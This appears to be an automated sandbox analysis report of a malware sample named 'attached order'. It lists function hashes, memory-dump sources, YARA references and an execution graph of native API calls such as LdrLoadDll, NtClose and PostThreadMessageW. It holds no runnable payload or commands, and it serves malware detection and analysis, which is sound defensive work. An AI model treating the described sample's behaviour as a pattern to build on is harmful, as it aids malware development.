                                                                                          • Instruction ID: e4433f390db15eb5f17dad00da72a5b83d7c96cf41d136940a995736cba02a91
                                                                                          • Opcode Fuzzy Hash: d7ec96982a7fa812b5d8c257b7e93f51910ba5d8ce396dae053e86fb389ca6d6
                                                                                          • Instruction Fuzzy Hash: 3B712974E0124ADFDB04CF99D580AEEFBB6FB88310F18852AD505AB315D334AA41CF95
                                                                                          Function 01AB5828 Relevance: .2, Instructions: 167COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 62effcdb85aec8199c0c6ac3cb348810ccf2c5bfdbc6336f1cca61a3972c51ec
                                                                                          • Instruction ID: 86d3f1a9a26095933db4136b009ed149e68903ef3226c1264a9a7759f88cdbe5
                                                                                          • Opcode Fuzzy Hash: 62effcdb85aec8199c0c6ac3cb348810ccf2c5bfdbc6336f1cca61a3972c51ec
                                                                                          • Instruction Fuzzy Hash: 9661E574E05609DFCB08CFA9C9805DEFBF6FF89210F28942AD505B7225D3349A418F68
                                                                                          Function 01AB5818 Relevance: .2, Instructions: 165COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 496b960c535ba84c87c5078e9a0e267f2c1717af415d1ca5b1d9ea7817245643
                                                                                          • Instruction ID: 5929a2ae483f08547478179341baacf2ffe131315f0fe795bc922d46be3ff2aa
                                                                                          • Opcode Fuzzy Hash: 496b960c535ba84c87c5078e9a0e267f2c1717af415d1ca5b1d9ea7817245643
                                                                                          • Instruction Fuzzy Hash: E161E374E05649CFCB08CFA9C5809EEFBF6EF89210F28946AD515F7225D3349A428F64
                                                                                          Function 0BA73041 Relevance: .2, Instructions: 165COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2ac20c11b13df43511b2b83c34b00737dd5c6a9f5b56e2cd108bb4e7d27b7f81
                                                                                          • Instruction ID: 2c1b8300e931e605f588005aa5b2133ba7f8a654bf3dd18a6f3be7baf7f48144
                                                                                          • Opcode Fuzzy Hash: 2ac20c11b13df43511b2b83c34b00737dd5c6a9f5b56e2cd108bb4e7d27b7f81
                                                                                          • Instruction Fuzzy Hash: B4612A71A012498FE748EF6EE95068ABBF3FF88315F14C46ED0159B2A6EB345846CF50
                                                                                          Function 0BA73050 Relevance: .2, Instructions: 159COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1fd9c1cc85a83c199c6859bf3218024bddc67243f242bca953d5ac86b7892632
                                                                                          • Instruction ID: ccec92f98ad8e5169e4ce6417bf61a5dd04fbd70cac7ee07b81d21928e2e07da
                                                                                          • Opcode Fuzzy Hash: 1fd9c1cc85a83c199c6859bf3218024bddc67243f242bca953d5ac86b7892632
                                                                                          • Instruction Fuzzy Hash: 28610C71A012498FE748EF6EE950689BBF3FF88315F14C46ED0159B2A6EB345846CF50
                                                                                          Function 0A320006 Relevance: .2, Instructions: 156COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 037ed84eaa7f8737f50447524fd60cafa4699e8e1202d68286c0c64d919dc15b
                                                                                          • Instruction ID: 21562edd30e5e74e4160877e4f6eaabd76d3c4f2b3c9c1af771b006961e40270
                                                                                          • Opcode Fuzzy Hash: 037ed84eaa7f8737f50447524fd60cafa4699e8e1202d68286c0c64d919dc15b
                                                                                          • Instruction Fuzzy Hash: AC619E70D052598FDB15CFA9C9515AEFBF2FF8A304F2481AAC408AB216D730AD06CF61
                                                                                          Function 0BA7E780 Relevance: .1, Instructions: 141COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6d6d19eecaa3ff31f73038e62500b40cf1a2607165d8760f3c96f1f21fd3a268
                                                                                          • Instruction ID: 7539e37246bdae847f394933ccf9f42bf431ec0fbd29e3295e93154a7ce56199
                                                                                          • Opcode Fuzzy Hash: 6d6d19eecaa3ff31f73038e62500b40cf1a2607165d8760f3c96f1f21fd3a268
                                                                                          • Instruction Fuzzy Hash: 11512A74E042198FDB54DFA9C9415AEFBB6FF89304F2481AAD418AB316D7309942CF61
                                                                                          Function 0BA7E349 Relevance: .1, Instructions: 137COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7069e4683adc8aff0d0c9179a807c04d8c98aa0aa62f63e6dbc7f7dd8861d0f7
                                                                                          • Instruction ID: d4dbf70a72ba0c8159a0fc5a020c3214a4226b1d880b00ba4be2804e0cd8afec
                                                                                          • Opcode Fuzzy Hash: 7069e4683adc8aff0d0c9179a807c04d8c98aa0aa62f63e6dbc7f7dd8861d0f7
                                                                                          • Instruction Fuzzy Hash: 25512A74E042198BDB14DFA9C9415AEFBF2FF89304F2481AAD418AB315D7319942CF61
                                                                                          Function 0BA7EBBB Relevance: .1, Instructions: 134COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4e2f9c44cdfd6541b76382b278771d15e7c8903c613049c07555754c01ae634b
                                                                                          • Instruction ID: 4c716373d331b0137eb83ec5aeccb6be29b8e113154b68310a1af7e3887d4ac4
                                                                                          • Opcode Fuzzy Hash: 4e2f9c44cdfd6541b76382b278771d15e7c8903c613049c07555754c01ae634b
                                                                                          • Instruction Fuzzy Hash: 4B512E74E052198FDB14DFA9C9409AEFBF2FF89304F2481A9D418A7315D7319942CFA1
                                                                                          Function 01AB5662 Relevance: .1, Instructions: 114COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0f1124dae049ae8047f15a1621701c4f08ff6875acec90f7bacaa664363de85d
                                                                                          • Instruction ID: 2c0e706bb5ceba376e58e8e0c42f6e533307c37827762c9cbe0c51327410c37f
                                                                                          • Opcode Fuzzy Hash: 0f1124dae049ae8047f15a1621701c4f08ff6875acec90f7bacaa664363de85d
                                                                                          • Instruction Fuzzy Hash: 01410574E0424A9FCB44CFAAD4815EEFBF2EF99300F28C46AC515AB255E3349642CF94
                                                                                          Function 01AB5AA0 Relevance: .1, Instructions: 114COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dad9c135b52e5eefd08815a5d72d77a61b8b5c72bcedddc3e00f219dba7d1536
                                                                                          • Instruction ID: 35e1315b174c5ead9e26f9e2429a163c9bbd1a116b1d6e6d35b19d05a5ecb225
                                                                                          • Opcode Fuzzy Hash: dad9c135b52e5eefd08815a5d72d77a61b8b5c72bcedddc3e00f219dba7d1536
                                                                                          • Instruction Fuzzy Hash: 3C410270E0564ADFCB48DFAAC5C05EEFBF6FB88200F24C46AC405BB215E7349A418B94
                                                                                          Function 01AB5A91 Relevance: .1, Instructions: 114COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0a2a0f86ac6ae1a3b6fa3137c9201c927d247d847732e551ff4238f8b50852c7
                                                                                          • Instruction ID: 622261f7e43d9a64b6057ce0a4b3e32c800d2eba2d66f7fb52e5ceea99bcb522
                                                                                          • Opcode Fuzzy Hash: 0a2a0f86ac6ae1a3b6fa3137c9201c927d247d847732e551ff4238f8b50852c7
                                                                                          • Instruction Fuzzy Hash: 0E411874E0564A9FCB04DFAAC5C55AEFBF6FF88200F24C46AC405BB215D7309A418B94
                                                                                          Function 01AB5670 Relevance: .1, Instructions: 113COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f69a4a3e20cc185d0e9bda3b4af57fccdcb6023af464837b7145c37e3ff1ac3e
                                                                                          • Instruction ID: d653896904d6cdb7bb32d286a1c252038a861d7b837eae670e9f272d8436146f
                                                                                          • Opcode Fuzzy Hash: f69a4a3e20cc185d0e9bda3b4af57fccdcb6023af464837b7145c37e3ff1ac3e
                                                                                          • Instruction Fuzzy Hash: 7041F5B4E0424A9FCB44CFAAC5815EEFBF6EF99300F28D42AC515AB255D3349641CF94
                                                                                          Function 05A3CFF8 Relevance: .1, Instructions: 79COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a1b60afcabdfca75aedc5ffce2e08af75a72d5fd8ef91bb9b26ac79214edb6dd
                                                                                          • Instruction ID: 6be6a4658e1a72e91c251662096ebc630040dff2cb238797a4b57d5fd53ccabf
                                                                                          • Opcode Fuzzy Hash: a1b60afcabdfca75aedc5ffce2e08af75a72d5fd8ef91bb9b26ac79214edb6dd
                                                                                          • Instruction Fuzzy Hash: E4314B71E11219DBDB18CFAAD941AAEFBB7FBC9710F14C16AE418B7264D7305A028F50
                                                                                          Function 05A3CFE8 Relevance: .1, Instructions: 74COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0b93893425fa51bda83c5be2d9772d37b1bec8630fc86dcbaf5a5a2b6696e58a
                                                                                          • Instruction ID: eb2b5b8c80146df3dac765d31db3fc2fe4b0809d86fa36d008ab2543a5eaf1c9
                                                                                          • Opcode Fuzzy Hash: 0b93893425fa51bda83c5be2d9772d37b1bec8630fc86dcbaf5a5a2b6696e58a
                                                                                          • Instruction Fuzzy Hash: 00314F71E11219DBDB08CFAAD941AAEFBB3BFC9700F14C16AD418B7268D7304A028F50
                                                                                          Function 01AB0870 Relevance: .1, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1d9e9a419df2a9c9d5e252457eb87540e3d838e3769d0c34ba27326c2955cbc0
                                                                                          • Instruction ID: 5fbfc87a9ce4a90a4d9989c88d225ecc19894160f5b7c62ad2cb0463f858fd8e
                                                                                          • Opcode Fuzzy Hash: 1d9e9a419df2a9c9d5e252457eb87540e3d838e3769d0c34ba27326c2955cbc0
                                                                                          • Instruction Fuzzy Hash: 8C211D71E056588FEB18CFABD8446DEFBF7AFC8200F08C07AD518A6229EB3005568F51

                                                                                          Execution Graph

                                                                                          Execution Coverage:1.4%
                                                                                          Dynamic/Decrypted Code Coverage:5.6%
                                                                                          Signature Coverage:8%
                                                                                          Total number of Nodes:162
                                                                                          Total number of Limit Nodes:14
                                                                                          execution_graph 85335 42c403 85336 42c41d 85335->85336 85339 1772d10 LdrInitializeThunk 85336->85339 85337 42c445 85339->85337 85340 4250c3 85341 4250df 85340->85341 85342 425107 85341->85342 85343 42511b 85341->85343 85345 42ce23 NtClose 85342->85345 85350 42ce23 85343->85350 85347 425110 85345->85347 85346 425124 85353 42f033 85346->85353 85349 42512f 85351 42ce3d 85350->85351 85352 42ce4e NtClose 85351->85352 85352->85346 85356 42d143 85353->85356 85355 42f050 85355->85349 85357 42d15d 85356->85357 85358 42d16e RtlAllocateHeap 85357->85358 85358->85355 85359 401b81 85360 401b86 85359->85360 85363 430483 85360->85363 85366 42ea93 85363->85366 85367 42eab7 85366->85367 85378 407613 85367->85378 85369 42eae0 85370 401c1a 85369->85370 85381 41b793 85369->85381 85372 42eaff 85373 42eb14 85372->85373 85396 42d1e3 85372->85396 85392 428993 85373->85392 85376 42eb2e 85377 42d1e3 ExitProcess 85376->85377 85377->85370 85380 407620 85378->85380 85399 416af3 85378->85399 85380->85369 85382 41b7bf 85381->85382 85427 41b683 85382->85427 85385 41b7ec 85386 42ce23 NtClose 85385->85386 85389 41b7f7 85385->85389 85386->85389 85387 41b820 85387->85372 85388 41b804 85388->85387 85390 42ce23 NtClose 85388->85390 85389->85372 85391 41b816 85390->85391 85391->85372 85393 4289f4 85392->85393 85395 428a01 85393->85395 85438 418cb3 85393->85438 85395->85376 85397 42d200 85396->85397 85398 42d211 ExitProcess 85397->85398 85398->85373 85401 416b10 85399->85401 85400 416b29 85400->85380 85401->85400 85406 42d863 85401->85406 85403 416b84 85403->85400 85413 4296b3 NtClose LdrInitializeThunk 85403->85413 85405 416bd5 85405->85380 85408 42d87d 85406->85408 85407 42d8ac 85407->85403 85408->85407 85414 42c453 85408->85414 85413->85405 85415 42c46d 85414->85415 85421 1772b2a 85415->85421 85416 42c499 85418 42ef13 85416->85418 85424 42d193 85418->85424 85420 42d925 85420->85403 85422 1772b31 85421->85422 85423 1772b3f LdrInitializeThunk 85421->85423 85422->85416 85423->85416 85425 42d1b0 85424->85425 85426 42d1c1 RtlFreeHeap 85425->85426 85426->85420 85428 41b779 85427->85428 85429 41b69d 85427->85429 85428->85385 85428->85388 85433 42c4f3 85429->85433 85432 42ce23 NtClose 85432->85428 85434 42c50d 85433->85434 85437 17734e0 LdrInitializeThunk 85434->85437 85435 41b76d 85435->85432 85437->85435 85440 418cdd 85438->85440 85439 4191eb 85439->85395 85440->85439 85446 4142b3 85440->85446 85442 418e0a 85442->85439 85443 42ef13 RtlFreeHeap 85442->85443 85444 418e22 85443->85444 85444->85439 85445 42d1e3 ExitProcess 85444->85445 85445->85439 85450 4142d3 85446->85450 85448 41433c 85448->85442 85450->85448 85451 41baa3 85450->85451 85452 41bac8 85451->85452 85453 414332 85452->85453 85455 42ef13 RtlFreeHeap 85452->85455 85456 41b8e3 85452->85456 85453->85442 85455->85452 85457 41b8f4 85456->85457 85458 42c453 LdrInitializeThunk 85457->85458 85459 41b93b 85457->85459 85458->85459 85459->85452 85463 425453 85465 42546c 85463->85465 85464 4254b4 85466 42ef13 RtlFreeHeap 85464->85466 85465->85464 85468 4254f4 85465->85468 85470 4254f9 85465->85470 85467 4254c4 85466->85467 85469 42ef13 RtlFreeHeap 85468->85469 85469->85470 85471 42eed3 85474 42d053 85471->85474 85475 42d070 85474->85475 85478 1772eb0 LdrInitializeThunk 85475->85478 85476 42d09c 85478->85476 85517 42ffb3 85518 42ffc3 85517->85518 85519 42ffc9 85517->85519 85520 42eff3 RtlAllocateHeap 85519->85520 85521 42ffef 85520->85521 85479 414653 85480 41466d 85479->85480 85482 41468b 85480->85482 85485 417e43 85480->85485 85483 4146d0 85482->85483 85484 4146bf PostThreadMessageW 85482->85484 85484->85483 85487 417e67 85485->85487 85486 417e6e 85486->85482 85487->85486 85488 417ea6 LdrLoadDll 85487->85488 85488->85486 85489 41ac13 85490 41ac2b 85489->85490 85492 41ac85 85489->85492 85490->85492 85493 41eb83 85490->85493 85494 41eba9 85493->85494 85498 41eca0 85494->85498 85499 4300e3 85494->85499 85496 41ec3e 85497 42c453 LdrInitializeThunk 85496->85497 85496->85498 85497->85498 85498->85492 85500 430053 85499->85500 85501 4300b0 85500->85501 85505 42eff3 85500->85505 85501->85496 85503 43008d 85504 42ef13 RtlFreeHeap 85503->85504 85504->85501 85506 42d143 RtlAllocateHeap 85505->85506 85507 42f00e 85506->85507 85507->85503 85522 415ff3 85523 416018 85522->85523 85524 417e43 LdrLoadDll 85523->85524 85525 41604e 85524->85525 85526 416076 85525->85526 85528 419bc3 85525->85528 85529 419bf6 85528->85529 85530 419c1a 85529->85530 85535 42c973 85529->85535 85530->85526 85532 419c3d 85532->85530 85533 42ce23 NtClose 85532->85533 85534 419cbd 85533->85534 85534->85526 85536 42c990 85535->85536 85539 1772bc0 LdrInitializeThunk 85536->85539 85537 42c9bc 85537->85532 85539->85537 85540 1772a80 LdrInitializeThunk 85460 419408 85461 42ce23 NtClose 85460->85461 85462 419412 85461->85462 85508 41415e 85509 4140ea 85508->85509 85512 42d0a3 85509->85512 85513 42d0c0 85512->85513 85516 1772b90 LdrInitializeThunk 85513->85516 85514 4140f5 85516->85514

                                                                                          Executed Functions

                                                                                          Function 00417E43 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 238 417e43-417e6c call 42faf3 241 417e72-417e80 call 4300f3 238->241 242 417e6e-417e71 238->242 245 417e90-417ea1 call 42e563 241->245 246 417e82-417e8d call 430393 241->246 251 417ea3-417eb7 LdrLoadDll 245->251 252 417eba-417ebd 245->252 246->245 251->252
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                                                          • Instruction ID: 0239aaf377b2fcb4487d59bb34220ffa315be4273f3f7c08583bd14527f70908
                                                                                          • Opcode Fuzzy Hash: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                                                          • Instruction Fuzzy Hash: 0E0175B1E0020DB7DF10DBE1DC42FDEB7B8AB54308F0041A6E90897240F675EB448795
                                                                                          Function 0042CE23 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 281 42ce23-42ce5c call 404a23 call 42e053 NtClose
                                                                                          APIs
                                                                                          • NtClose.NTDLL(?,004169F6,001F0001,?,00000000,?,?,00000104), ref: 0042CE57
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          • Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                          • Instruction ID: 33cbf207f0ed10b52c0e063f06a2fa8859cf4e21cf3480f9a20cea2f9fe365d9
                                                                                          • Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                          • Instruction Fuzzy Hash: 16E04F762102147BC520EA5ADC01FDBB75CEBC5754F004419FA0867145C6B57A0187E4
                                                                                          Function 01772BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 11f712251ff3a6462a79f3741eb66c71527def8724a960a7170ba60b78c0ff86
                                                                                          • Instruction ID: cef2bc37c238c1ff82012d3d84a56300e569f15f98eb2d378e7844a214bb1c4f
                                                                                          • Opcode Fuzzy Hash: 11f712251ff3a6462a79f3741eb66c71527def8724a960a7170ba60b78c0ff86
                                                                                          • Instruction Fuzzy Hash: D79002312A500442D60076986508646500597E0301F91D525A5018555EC67588917132
                                                                                          Function 01772B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: f60cf7234048e991b1cf9782e37e7d480ed9f069fe0079440151785f0c13adf6
                                                                                          • Instruction ID: c0d1591a8bd486bbca8c227d02286b82642bfab79346a4d8d8e3c835eba83ead
                                                                                          • Opcode Fuzzy Hash: f60cf7234048e991b1cf9782e37e7d480ed9f069fe0079440151785f0c13adf6
                                                                                          • Instruction Fuzzy Hash: 239002312A508842D6107258950474A500597D0301F95C925A4418658DC6A588917122
                                                                                          Function 01772A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 397944ba792f1baa5f08a56f9f04a5767bfd5ca4fbbeafc8ce0130a8c75ba594
                                                                                          • Instruction ID: dd3fe3b9ad5f87625c6fb94c2b9f5d3d6738d77a4dfffee133bfa581b731128c
                                                                                          • Opcode Fuzzy Hash: 397944ba792f1baa5f08a56f9f04a5767bfd5ca4fbbeafc8ce0130a8c75ba594
                                                                                          • Instruction Fuzzy Hash: CD9002612A600043460572585514616900A97E0201B91C535E1008590DC53588917126
                                                                                          Function 01772D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: a6a3c1a2118544bebc9b36ff63ad94100f54d56a35d8e2654f9fab50fcadc3ce
                                                                                          • Instruction ID: d60f74b4cc7c9919bf85f4fd2877d642d2c4781cb7d610c1136b8b850ac876f1
                                                                                          • Opcode Fuzzy Hash: a6a3c1a2118544bebc9b36ff63ad94100f54d56a35d8e2654f9fab50fcadc3ce
                                                                                          • Instruction Fuzzy Hash: 309002312A500453D61172585604707500997D0241FD1C926A0418558DD6668952B122
                                                                                          Function 01772EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 87f4b95504ca8878d4bb81c948d3ead8294716b0d750057819da0f62831deb4d
                                                                                          • Instruction ID: d6748b5ebe6458092fa19ffbd0f60ff73d146316130257904f4bb0c7f7b504a4
                                                                                          • Opcode Fuzzy Hash: 87f4b95504ca8878d4bb81c948d3ead8294716b0d750057819da0f62831deb4d
                                                                                          • Instruction Fuzzy Hash: 509002312A540442D6007258591470B500597D0302F91C525A1158555DC63588517572
                                                                                          Function 017734E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 84faf2d54b7ce410697eb8a53bd7f4e96547c73b2a7a503c32b73aaef3210f3f
                                                                                          • Instruction ID: 3feeb35fde9f4db7b14ab1fb89138f9db2307344ad1bebf3ef2ab746a0d50310
                                                                                          • Opcode Fuzzy Hash: 84faf2d54b7ce410697eb8a53bd7f4e96547c73b2a7a503c32b73aaef3210f3f
                                                                                          • Instruction Fuzzy Hash: 129002316A910442D60072585614706600597D0201FA1C925A0418568DC7A5895175A3
